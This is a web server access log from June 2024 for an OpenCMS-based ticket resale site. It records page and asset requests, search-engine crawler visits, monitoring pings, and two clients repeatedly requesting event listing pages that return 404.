93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/arrow.gif HTTP/1.1" 200 344
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
93.160.177.14 - - [19/Jun/2024:01:16:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/form_marker.gif HTTP/1.1" 200 43
93.160.177.14 - - [19/Jun/2024:01:16:48 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
93.160.177.14 - - [19/Jun/2024:01:16:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
95.91.110.20 - - [19/Jun/2024:01:16:49 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=0116FCC4-F00F-0C90-5340-21E4C3FAA3BB&sortorder=desc&column=price HTTP/1.1" 404 -
93.160.177.14 - - [19/Jun/2024:01:16:50 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:16:55 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=0116FCC4-F00F-0C90-5340-21E4C3FAA3BB&sortorder=desc&column=row HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:17:00 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=0116FCC4-F00F-0C90-5340-21E4C3FAA3BB&sortorder=desc&column=section HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:17:05 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=0129609A-3018-8F44-D6E1-E02EE1FA3514 HTTP/1.1" 404 -
47.128.114.251 - - [19/Jun/2024:01:17:08 +0200] "GET /ticket2/opencms/no/buy/?catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&eventid=66D77204-4B8D-B660-88DB-7A93BC4629FF&page=7 HTTP/1.1" 200 83089
47.128.114.251 - - [19/Jun/2024:01:17:08 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.114.251 - - [19/Jun/2024:01:17:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.114.251 - - [19/Jun/2024:01:17:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.114.251 - - [19/Jun/2024:01:17:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.114.251 - - [19/Jun/2024:01:17:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.114.251 - - [19/Jun/2024:01:17:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.114.251 - - [19/Jun/2024:01:17:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
95.91.110.20 - - [19/Jun/2024:01:17:10 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=0139FA24-737E-1DAB-32CD-535D51C7669A HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:17:16 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=016EEFE0-BEFC-66E2-7958-7FFA479AAFD5 HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:17:21 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=01745CB4-1541-6B4A-0CB3-D471D2EDB078&sortorder=asc&column=price HTTP/1.1" 404 -
40.77.167.65 - - [19/Jun/2024:01:17:25 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=F8833760-0DC8-DF8A-F6E9-B98891A0A72D HTTP/1.1" 200 87802
95.91.110.20 - - [19/Jun/2024:01:17:26 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=01745CB4-1541-6B4A-0CB3-D471D2EDB078&sortorder=desc&column=row HTTP/1.1" 404 -
114.119.130.175 - - [19/Jun/2024:01:17:32 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=53761E65-F89B-BBEE-6188-DCF95DA0DC4F HTTP/1.1" 200 87806
66.249.75.41 - - [19/Jun/2024:01:17:34 +0200] "GET /ticket2/opencms/it/ HTTP/1.1" 200 111619
95.91.110.20 - - [19/Jun/2024:01:17:35 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=017877D6-AD6D-7619-CD21-72EA53A1F341 HTTP/1.1" 404 -
85.208.96.206 - - [19/Jun/2024:01:17:37 +0200] "GET /ticket2/opencms/fi/search.html?searchQuery=winnipeg%2Bjets&submit.x=0&submit.y=0 HTTP/1.1" 200 93377
95.91.110.20 - - [19/Jun/2024:01:17:40 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=017877D6-AD6D-7619-CD21-72EA53A1F341&sortorder=desc&column=price HTTP/1.1" 404 -
85.208.96.208 - - [19/Jun/2024:01:17:45 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
95.91.110.20 - - [19/Jun/2024:01:17:46 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=017877D6-AD6D-7619-CD21-72EA53A1F341&sortorder=desc&column=row HTTP/1.1" 404 -
85.208.96.210 - - [19/Jun/2024:01:17:47 +0200] "GET /ticket2/opencms/en/sport/football-tickets/bundesliga/mainz/ HTTP/1.1" 200 72358
95.91.110.20 - - [19/Jun/2024:01:17:51 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=017877D6-AD6D-7619-CD21-72EA53A1F341&sortorder=desc&column=section HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:17:57 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=01A733B6-382E-048A-BD81-D5CAC59B6BBB HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:18:02 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=02013735-73ED-40FA-90F3-7305F7F53475 HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:18:08 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=0226A6B7-0BBD-40A6-8BD9-9B12CF3E86ED HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:18:13 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=0226A6B7-0BBD-40A6-8BD9-9B12CF3E86ED&sortorder=desc&column=price HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:18:18 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=0226A6B7-0BBD-40A6-8BD9-9B12CF3E86ED&sortorder=desc&column=row HTTP/1.1" 404 -
52.167.144.216 - - [19/Jun/2024:01:18:19 +0200] "GET /ticket2/opencms/sitemap.xml HTTP/1.1" 200 76218
95.91.110.20 - - [19/Jun/2024:01:18:24 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=0226A6B7-0BBD-40A6-8BD9-9B12CF3E86ED&sortorder=desc&column=section HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:18:29 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=02574B4C-87EB-6F72-914F-1B119C6EFE8B HTTP/1.1" 404 -
40.77.167.136 - - [19/Jun/2024:01:18:33 +0200] "GET /ticket2/opencms/no/venue/?venueid=6FA55CAA-E7CD-0645-363F-8301E170D823 HTTP/1.1" 200 72679
95.91.110.20 - - [19/Jun/2024:01:18:39 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=025FD187-2053-F99E-11DF-DFCE54A1DA14 HTTP/1.1" 404 -
40.77.167.55 - - [19/Jun/2024:01:18:39 +0200] "GET /ticket2/opencms/en/venue/?venueid=86DEA7DE-EC8B-6F7F-4E07-89780910ACCD HTTP/1.1" 200 71350
66.249.75.43 - - [19/Jun/2024:01:18:44 +0200] "GET /ticket2/opencms/es/ HTTP/1.1" 200 111777
95.91.110.20 - - [19/Jun/2024:01:18:44 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=028BD9CD-FB54-2ACE-6838-AA954A93FDE4 HTTP/1.1" 404 -
114.119.138.151 - - [19/Jun/2024:01:18:45 +0200] "GET /ticket2/opencms/en/venue/?venueid=91672A3F-D5FF-A436-E120-7AA50E9CF3E6 HTTP/1.1" 200 71396
114.119.130.248 - - [19/Jun/2024:01:18:46 +0200] "GET /ticket2/opencms/en/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=BDD8C04C-DD99-1C07-B5F3-F2AB98D157E8 HTTP/1.1" 200 82211
95.91.110.20 - - [19/Jun/2024:01:18:49 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=02A00A05-668A-B57A-1A9F-B82023F1983A&sortorder=asc&column=section HTTP/1.1" 404 -
85.208.96.208 - - [19/Jun/2024:01:18:54 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
95.91.110.20 - - [19/Jun/2024:01:18:55 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=0E19E86A-1D67-848F-569E-BCBDFE5101EE&sortorder=desc&column=row HTTP/1.1" 404 -
185.191.171.13 - - [19/Jun/2024:01:18:56 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/bundesliga/werder-bremen/ HTTP/1.1" 200 72449
95.91.110.20 - - [19/Jun/2024:01:19:00 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=0E19E86A-1D67-848F-569E-BCBDFE5101EE&sortorder=desc&column=section HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:19:05 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=028BD9CD-FB54-2ACE-6838-AA954A93FDE4&sortorder=desc&column=price HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:19:06 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=0E78FCAC-2C27-F7B4-A879-E4B000248D28 HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:19:11 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=674A96E1-4B9C-1EEC-4D35-A637DDEAF802&sortorder=asc&column=row HTTP/1.1" 404 -
216.245.221.83 - - [19/Jun/2024:01:19:11 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
216.245.221.83 - - [19/Jun/2024:01:19:11 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
95.91.110.20 - - [19/Jun/2024:01:19:11 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=0FB0E314-7724-B9C7-6FA0-35E67023F72E HTTP/1.1" 404 -
52.167.144.207 - - [19/Jun/2024:01:19:16 +0200] "GET /ticket2/opencms/en/sell/?edid=8839DE43-02D6-1964-9569-34CA7978C5BC HTTP/1.1" 302 -
194.247.173.99 - - [19/Jun/2024:01:19:16 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=674A96E1-4B9C-1EEC-4D35-A637DDEAF802&sortorder=asc&column=section HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:19:17 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=1015CA7B-62B8-A132-8649-0F3DC2687EF5 HTTP/1.1" 404 -
52.167.144.207 - - [19/Jun/2024:01:19:19 +0200] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 73431
194.247.173.99 - - [19/Jun/2024:01:19:21 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=679E3A3F-C113-5905-1ACD-2C7BC3B42CDB HTTP/1.1" 404 -
185.191.171.1 - - [19/Jun/2024:01:19:21 +0200] "GET /ticket2/opencms/nl/sport/voetbal-tickets/la_liga/athletic-bilbao/ HTTP/1.1" 200 71705
95.91.110.20 - - [19/Jun/2024:01:19:23 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=102514C2-4BB6-AD7D-D260-D9537E2D3DE4 HTTP/1.1" 404 -
185.191.171.17 - - [19/Jun/2024:01:19:24 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/la_liga/rayo_vallecano/ HTTP/1.1" 200 73375
194.247.173.99 - - [19/Jun/2024:01:19:26 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=67B3819E-C203-F7C9-1C5C-2A1AF592C733 HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:19:29 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=102514C2-4BB6-AD7D-D260-D9537E2D3DE4&sortorder=desc&column=price HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:19:32 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=67B3819E-C203-F7C9-1C5C-2A1AF592C733&sortorder=desc&column=section HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:19:34 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=102514C2-4BB6-AD7D-D260-D9537E2D3DE4&sortorder=desc&column=row HTTP/1.1" 404 -
40.77.167.136 - - [19/Jun/2024:01:19:36 +0200] "GET /ticket2/opencms/dk/venue/?venueid=16CA27B2-E6FB-6299-A50A-93A7567AD2E3 HTTP/1.1" 200 71890
194.247.173.99 - - [19/Jun/2024:01:19:37 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6875AE46-58DA-9D07-CD12-63DF9AF5CB06 HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:19:40 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=102514C2-4BB6-AD7D-D260-D9537E2D3DE4&sortorder=desc&column=section HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:19:42 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6875AE46-58DA-9D07-CD12-63DF9AF5CB06&sortorder=desc&column=section HTTP/1.1" 404 -
207.46.13.168 - - [19/Jun/2024:01:19:45 +0200] "GET /ticket2/opencms/en/venue/?venueid=91672A3F-D5FF-A436-E120-7AA50E9CF3E6 HTTP/1.1" 200 71396
194.247.173.99 - - [19/Jun/2024:01:19:48 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=68990A86-D741-9689-B00B-FC485A932524&sortorder=asc&column=price HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:19:53 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=68990A86-D741-9689-B00B-FC485A932524&sortorder=asc&column=row HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:19:56 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=103AD396-B055-A08A-E444-A3BE21AAD774 HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:19:58 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=68AF64D9-DC10-F854-39FA-84D5E1F2F070 HTTP/1.1" 404 -
40.77.167.4 - - [19/Jun/2024:01:20:00 +0200] "GET /ticket2/opencms/dk/venue/?venueid=5216E917-1606-FFAB-0933-662F7037E961 HTTP/1.1" 200 71777
95.91.110.20 - - [19/Jun/2024:01:20:02 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=10460286-023B-DF27-E433-B371940C5050 HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:20:03 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=68AF64D9-DC10-F854-39FA-84D5E1F2F070&sortorder=desc&column=price HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:20:07 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=10515F0B-6422-A692-0748-D7547F0F118B HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:20:08 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6DE4FD2D-4823-E3FB-FB13-102F5CD85ACC&sortorder=asc&column=price HTTP/1.1" 404 -
114.119.138.151 - - [19/Jun/2024:01:20:12 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=62E963F6-DADB-8AFF-A399-D24EBBE5E857 HTTP/1.1" 200 87570
95.91.110.20 - - [19/Jun/2024:01:20:13 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=106BCEB3-13F0-783A-EE54-960BEB88B5BD HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:20:14 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6DE6F49B-9DDC-AE93-D3C4-D0745D66A6AA&sortorder=asc&column=section HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:20:18 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=106FABEB-1625-76C0-96E9-569261E1AC5D HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:20:19 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6DF37A9E-22D9-513C-6DAE-4A3EAB281B73&sortorder=asc&column=section HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:20:23 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=106FABEB-1625-76C0-96E9-569261E1AC5D&sortorder=asc&column=price HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:20:25 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6DFD8F8B-B309-A5E8-A530-959D20F8D336&sortorder=asc&column=price HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:20:28 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=106FABEB-1625-76C0-96E9-569261E1AC5D&sortorder=desc&column=section HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:20:30 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6DFD8F8B-B309-A5E8-A530-959D20F8D336&sortorder=asc&column=section HTTP/1.1" 404 -
85.208.96.195 - - [19/Jun/2024:01:20:33 +0200] "GET /ticket2/opencms/de/sport/fussball-tickets/bundesliga/rb_leipzig/ HTTP/1.1" 200 75678
95.91.110.20 - - [19/Jun/2024:01:20:34 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=10A62337-6080-4764-6B3B-E77181019E55 HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:20:35 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6E15960A-CBB7-F65E-AF9E-216AA3DAEF46&sortorder=asc&column=price HTTP/1.1" 404 -
40.77.167.241 - - [19/Jun/2024:01:20:38 +0200] "GET /ticket2/opencms/en/venue/?venueid=8682E816-1238-F4DA-A108-AC8CA9D6A4AD HTTP/1.1" 200 71461
95.91.110.20 - - [19/Jun/2024:01:20:39 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=10CEF099-02C7-E20B-5B86-024400E771C3 HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:20:41 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6E42A0C3-CDBA-EB4A-37FF-39D5E8CC32AF&sortorder=asc&column=section HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:20:45 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=114E8367-495D-2921-581D-A5757D17A2D8 HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:20:46 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6E5B08B0-3905-BF03-78B4-1F5EF1DE1581&sortorder=asc&column=price HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:20:51 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=119D38B2-781A-9D91-BD0C-66BB4D932A19 HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:20:51 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6E70CDDB-C7B3-B878-DD5B-C96D776C327D HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:20:56 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6E70CDDB-C7B3-B878-DD5B-C96D776C327D&sortorder=desc&column=price HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:21:01 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6E70CDDB-C7B3-B878-DD5B-C96D776C327D&sortorder=desc&column=row HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:21:02 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=11A49E69-EBA2-59C6-D214-0F928A95A29D&sortorder=desc&column=section HTTP/1.1" 404 -
85.208.96.193 - - [19/Jun/2024:01:21:03 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/champions_league/psg/ HTTP/1.1" 200 73856
95.91.110.20 - - [19/Jun/2024:01:21:07 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=11C4CCD7-63C8-3CBA-976E-E1B3E9A47DFB&sortorder=asc&column=price HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:21:07 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6E70CDDB-C7B3-B878-DD5B-C96D776C327D&sortorder=desc&column=section HTTP/1.1" 404 -
216.245.221.83 - - [19/Jun/2024:01:21:07 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
194.247.173.99 - - [19/Jun/2024:01:21:12 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6E8F24AB-74B3-3F4A-83EB-4CBDFC2D46B9&sortorder=desc&column=row HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:21:12 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=12968C36-EF0E-52F6-FF93-EF3AF0F97431&sortorder=asc&column=row HTTP/1.1" 404 -
216.245.221.83 - - [19/Jun/2024:01:21:14 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
194.247.173.99 - - [19/Jun/2024:01:21:17 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6E8F24AB-74B3-3F4A-83EB-4CBDFC2D46B9&sortorder=desc&column=section HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:21:18 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=2BCF554F-F8EF-4953-B86E-72FD3395B753&sortorder=desc&column=price HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:21:23 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6EA2D348-88C2-3D24-490F-B5624CA04074&sortorder=asc&column=price HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:21:23 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=2C223FC3-44F4-8846-CCA3-0CD3173CFC72&sortorder=asc&column=row HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:21:28 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=2C223FC3-44F4-8846-CCA3-0CD3173CFC72&sortorder=desc&column=row HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:21:28 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6EA2D348-88C2-3D24-490F-B5624CA04074&sortorder=asc&column=row HTTP/1.1" 404 -
93.160.177.14 - - [19/Jun/2024:01:21:31 +0200] "GET /ticket2/opencms/set_aff_cookie.jsp?partner=53673ED6-1455-FA54-818F-B1F67121E37C&url=/dk/buy/index.html%3Fpage%3D1%26edid%3D72E82760-BEC3-3CF9-6E90-2FDD50852364%26hlv%3D666d44d3-a96c-42d3-80dc-5bd20a01000f%23v1899666353 HTTP/1.1" 200 225
93.160.177.14 - - [19/Jun/2024:01:21:32 +0200] "GET /ticket2/opencms/dk/buy/?page=1&edid=72E82760-BEC3-3CF9-6E90-2FDD50852364&hlv=666d44d3-a96c-42d3-80dc-5bd20a01000f HTTP/1.1" 200 111965
93.160.177.14 - - [19/Jun/2024:01:21:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871
93.160.177.14 - - [19/Jun/2024:01:21:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
93.160.177.14 - - [19/Jun/2024:01:21:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 71935
93.160.177.14 - - [19/Jun/2024:01:21:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583
93.160.177.14 - - [19/Jun/2024:01:21:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338
93.160.177.14 - - [19/Jun/2024:01:21:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923
93.160.177.14 - - [19/Jun/2024:01:21:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229
93.160.177.14 - - [19/Jun/2024:01:21:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
93.160.177.14 - - [19/Jun/2024:01:21:32 +0200] "GET /ticket2/opencms/dk/ask-form.html HTTP/1.1" 200 2971
93.160.177.14 - - [19/Jun/2024:01:21:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 404 -
93.160.177.14 - - [19/Jun/2024:01:21:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
194.247.173.99 - - [19/Jun/2024:01:21:33 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6EA2D348-88C2-3D24-490F-B5624CA04074&sortorder=asc&column=section HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:21:34 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=2DED7F6B-68C5-9FFA-DD15-822B450F9317 HTTP/1.1" 404 -
114.119.129.235 - - [19/Jun/2024:01:21:37 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=272F2CE0-5DF9-24B7-E045-32BAD90FF217 HTTP/1.1" 200 88488
194.247.173.99 - - [19/Jun/2024:01:21:38 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6EA9C6C1-4A98-9DDB-09DD-280525870AC5&sortorder=desc&column=row HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:21:40 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=2E507560-4116-98C2-2DA7-8FBA6FB533EE HTTP/1.1" 404 -
40.77.167.136 - - [19/Jun/2024:01:21:42 +0200] "GET /ticket2/opencms/no/buy/?page=10&eventid=55D417BB-5412-3704-4054-63BFE95E046C HTTP/1.1" 200 74065
185.191.171.3 - - [19/Jun/2024:01:21:42 +0200] "GET /ticket2/opencms/sv/affiliateprogram.html HTTP/1.1" 200 72601
194.247.173.99 - - [19/Jun/2024:01:21:44 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6EA9C6C1-4A98-9DDB-09DD-280525870AC5&sortorder=desc&column=section HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:21:45 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=30124CDD-E1E5-5C0D-EAB8-8B8AA8F1C3A7&sortorder=asc&column=price HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:21:49 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=6EB89E9D-BF45-2307-D154-47CDC64ABF4D&sortorder=desc&column=row HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:21:50 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=30124CDD-E1E5-5C0D-EAB8-8B8AA8F1C3A7&sortorder=asc&column=row HTTP/1.1" 404 -
93.158.90.35 - - [19/Jun/2024:01:21:51 +0200] "GET /ticket2/opencms/de/robots.txt HTTP/1.1" 404 -
194.247.173.99 - - [19/Jun/2024:01:21:55 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=82C986F9-0D6E-C921-C10B-10465651AE1E&sortorder=desc&column=row HTTP/1.1" 404 -
95.91.110.20 - - [19/Jun/2024:01:21:56 +0200] "GET /ticket2/opencms/dk/sv/buy/?page=1&edid=30124CDD-E1E5-5C0D-EAB8-8B8AA8F1C3A7&sortorder=asc&column=section HTTP/1.1" 404 -
93.158.90.33 - - [19/Jun/2024:01:21:58 +0200] "GET /ticket2/opencms/de/ HTTP/1.1" 200 110226
